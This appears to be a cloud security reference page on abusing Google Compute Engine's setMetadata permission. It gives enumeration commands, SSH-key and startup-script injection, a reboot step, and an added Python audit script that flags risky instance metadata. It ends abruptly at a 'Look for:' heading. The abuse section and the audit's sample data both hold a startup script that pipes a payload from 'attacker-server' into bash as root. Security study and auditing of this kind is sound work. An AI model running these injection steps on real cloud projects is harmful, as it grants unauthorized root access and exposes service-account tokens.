compute.instances.setMetadata

The compute.instances.setMetadata permission allows a principal to modify the metadata of a Google Compute Engine VM instance. While metadata is intended for configuration purposes (such as SSH keys, startup scripts, and custom parameters), this permission can effectively lead to remote code execution if abused. An attacker with this permission can inject malicious startup scripts that execute as root on reboot or add SSH keys (if OS Login is not enforced) to gain shell access. If the targeted VM runs with a privileged service account, the attacker can then extract access tokens from the metadata server and escalate privileges across the project.

Enum

gcloud compute instances list
gcloud compute instances list --zones=ZONE
gcloud compute instances describe INSTANCE_NAME --zone=ZONE
gcloud compute instances describe INSTANCE_NAME \
--zone=ZONE --format="value(serviceAccounts.email)"

Abuse

## View metadata
gcloud compute instances describe INSTANCE_NAME \
--zone=ZONE --format="value(metadata.items)"

## Add ssh-keys
ssh-keygen -t rsa -b 4096 -f almighty-vinay -N ""
export PUBKEY="almighty-vinay:$(cat almighty-vinay.pub)"
gcloud compute instances add-metadata INSTANCE_NAME \
  --zone=ZONE \
  --metadata=ssh-keys="$PUBKEY"

## Inject startup script
gcloud compute instances add-metadata INSTANCE_NAME \
  --zone=ZONE \
  --metadata=startup-script='#!/bin/bash
curl http://attacker-server/payload.sh | bash'

## Reboot VM
gcloud compute instances reset INSTANCE_NAME --zone=ZONE

If OS Login is enforced:

  • SSH key injection via metadata may not work.
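As an added, defender-side example (not from the original page), a Python audit that reads the JSON returned by `gcloud compute instances describe INSTANCE_NAME --zone=ZONE --format=json` and flags the three conditions this page relies on: a boot-time script key in metadata, ssh-keys that are honoured because enable-oslogin is not TRUE, and an attached service account whose token is worth extracting. The instance documents below are constructed, and the audit only sees instance-level metadata, so an absent enable-oslogin is treated as not enforced and the project-level value is assumed to be checked separately.

```python
import json

# Metadata keys whose value is executed at boot, so anyone who can set them runs code on the VM.
EXEC_KEYS = {"startup-script", "startup-script-url",
             "windows-startup-script-ps1", "windows-startup-script-cmd",
             "windows-startup-script-bat", "windows-startup-script-url"}
CLOUD_PLATFORM = "https://www.googleapis.com/auth/cloud-platform"


def metadata_items(instance):
    """Flatten metadata.items into a dict (instance-level only; project metadata is not in this JSON)."""
    return {i["key"]: i.get("value", "") for i in instance.get("metadata", {}).get("items", [])}


def audit_instance(instance_json):
    """Return finding codes for one `describe --format=json` document."""
    inst = json.loads(instance_json)
    md = metadata_items(inst)
    findings = [f"EXEC_KEY:{key}" for key in sorted(EXEC_KEYS & md.keys())]
    # Instance-level enable-oslogin overrides the project value; when it is absent we
    # assume OS Login is not enforced and leave the project-level check to the caller.
    oslogin = md.get("enable-oslogin", "FALSE").strip().upper() == "TRUE"
    if "ssh-keys" in md and not oslogin:
        findings.append("SSH_KEYS_WITHOUT_OSLOGIN")
    for sa in inst.get("serviceAccounts", []):
        email = sa.get("email", "")
        # Broad scope or the default Compute SA: a token from the metadata server is high value.
        if CLOUD_PLATFORM in sa.get("scopes", []) or email.endswith("-compute@developer.gserviceaccount.com"):
            findings.append(f"PRIVILEGED_SA:{email}")
    return findings


# Constructed sample shaped like the output of `gcloud compute instances describe web-1 --format=json`.
RISKY_INSTANCE = json.dumps({
    "name": "web-1",
    "metadata": {"items": [
        {"key": "enable-oslogin", "value": "FALSE"},
        {"key": "ssh-keys", "value": "someuser:ssh-rsa AAAAB3NzaC1yc2E...constructed... someuser"},
        {"key": "startup-script", "value": "#!/bin/bash\ncurl http://attacker-server/payload.sh | bash"},
    ]},
    "serviceAccounts": [{"email": "123456-compute@developer.gserviceaccount.com",
                         "scopes": [CLOUD_PLATFORM]}],
})

# The same VM after remediation: OS Login enforced, no boot script, narrowly scoped service account.
HARDENED_INSTANCE = json.dumps({
    "name": "web-1",
    "metadata": {"items": [{"key": "enable-oslogin", "value": "TRUE"}]},
    "serviceAccounts": [{"email": "web-sa@my-project.iam.gserviceaccount.com",
                         "scopes": ["https://www.googleapis.com/auth/logging.write"]}],
})

if __name__ == "__main__":
    for label, doc in ("risky", RISKY_INSTANCE), ("hardened", HARDENED_INSTANCE):
        print(label, audit_instance(doc) or "no findings")
```

Feed it the `describe` output of every instance in `gcloud compute instances list` to find VMs where a setMetadata grant is effectively root plus a project-wide token.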

Check metadata:

Look for:
